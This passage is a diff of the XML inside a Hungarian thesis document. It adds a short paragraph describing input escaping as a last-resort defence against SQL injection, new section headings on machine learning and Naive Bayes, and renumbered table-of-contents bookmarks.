-      <w:bookmarkStart w:id="15" w:name="_Toc70610883"/>
-      <w:r>
-        <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="15"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ennek a technikának </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z egyszerű</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> célja, hogy elkerülje a felhasználói bevitelt, mielőtt lekérdezés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hez lehetne használni. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Alkalmazása</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a fenti módszerek megvalósíthatatlansága esetén kézenfekvő</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> lehet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, ám nem garancia az SQL injection megakadályozására</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, ún. végső lehetőséget biztosít</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6667,15 +6788,30 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
+        <w:ind w:left="284" w:hanging="284"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc70961906"/>
+      <w:r>
+        <w:t>GÉPI TANULÁS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="284" w:hanging="284"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc70610884"/>
-      <w:r>
-        <w:t>GÉPI TANULÁS</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="16"/>
-    </w:p>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Stlus1"/>
@@ -6683,15 +6819,30 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
+        <w:ind w:left="284" w:hanging="284"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc70961907"/>
+      <w:r>
+        <w:t>PROGRAM FELÉPÍTÉSE</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="284" w:hanging="284"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc70610885"/>
-      <w:r>
-        <w:t>PROGRAM FELÉPÍTÉSE</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="17"/>
-    </w:p>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Stlus1"/>
@@ -6699,18 +6850,25 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
+        <w:ind w:left="284" w:hanging="284"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc70961908"/>
+      <w:r>
+        <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="284" w:hanging="284"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc70610886"/>
-      <w:r>
-        <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="18"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="259" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -6753,7 +6911,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc70610887"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc70961909"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6763,7 +6921,7 @@
         </w:rPr>
         <w:t>Irodalomjegyzék</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6816,7 +6974,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc70610888"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc70961910"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6826,7 +6984,7 @@
         </w:rPr>
         <w:t>Nyilatkozat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7001,7 +7159,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc70610889"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc70961911"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7011,7 +7169,7 @@
         </w:rPr>
         <w:t>Köszönetnyilvánítás</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7036,9 +7194,9 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId10"/>
-      <w:footerReference w:type="default" r:id="rId11"/>
-      <w:headerReference w:type="first" r:id="rId12"/>
+      <w:headerReference w:type="default" r:id="rId11"/>
+      <w:footerReference w:type="default" r:id="rId12"/>
+      <w:headerReference w:type="first" r:id="rId13"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
@@ -7078,6 +7236,7 @@
         <w:docPartUnique/>
       </w:docPartObj>
     </w:sdtPr>
+    <w:sdtEndPr/>
     <w:sdtContent>
       <w:p>
         <w:pPr>
@@ -8856,6 +9015,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Bekezdsalapbettpusa">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Normltblzat">

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -660,7 +660,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc70961896"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71019988"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -739,7 +739,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc70961897"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc71019989"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1457,7 +1457,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:bookmarkStart w:id="4" w:name="_Toc70961898"/>
+          <w:bookmarkStart w:id="4" w:name="_Toc71019990"/>
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1483,7 +1483,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1510,7 +1509,7 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc70961896" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019988" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1538,7 +1537,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961896 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019988 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1575,7 +1574,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1584,7 +1582,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961897" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019989" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1612,7 +1610,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961897 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019989 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1649,7 +1647,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1658,7 +1655,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961898" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019990" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1686,7 +1683,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961898 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019990 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1723,7 +1720,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1732,7 +1728,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961899" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019991" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1760,7 +1756,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961899 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019991 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1798,7 +1794,6 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1807,7 +1802,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961900" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019992" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1851,7 +1846,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961900 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019992 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1889,7 +1884,6 @@
               <w:tab w:val="left" w:pos="880"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1898,7 +1892,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961901" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019993" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1944,7 +1938,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961901 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019993 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1982,7 +1976,6 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1991,7 +1984,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961902" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019994" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2035,7 +2028,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961902 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019994 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2073,7 +2066,6 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2082,7 +2074,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961903" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019995" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2126,7 +2118,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961903 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019995 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2164,7 +2156,6 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2173,7 +2164,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961904" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019996" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2217,7 +2208,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961904 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019996 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2255,7 +2246,6 @@
               <w:tab w:val="left" w:pos="880"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2264,7 +2254,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961905" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019997" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2310,7 +2300,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961905 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019997 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2348,7 +2338,6 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2357,7 +2346,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961906" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019998" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2401,7 +2390,189 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961906 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019998 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71019999" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>2.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Felügyelt tanulás</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019999 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1320"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71020000" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>2.1.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Naive Bayes</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020000 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2439,7 +2610,6 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2448,7 +2618,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961907" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020001" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2492,7 +2662,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961907 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020001 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2530,7 +2700,6 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2539,7 +2708,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961908" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020002" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2583,7 +2752,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961908 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020002 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2620,7 +2789,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2629,7 +2797,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961909" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020003" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2657,7 +2825,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961909 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020003 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2694,7 +2862,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
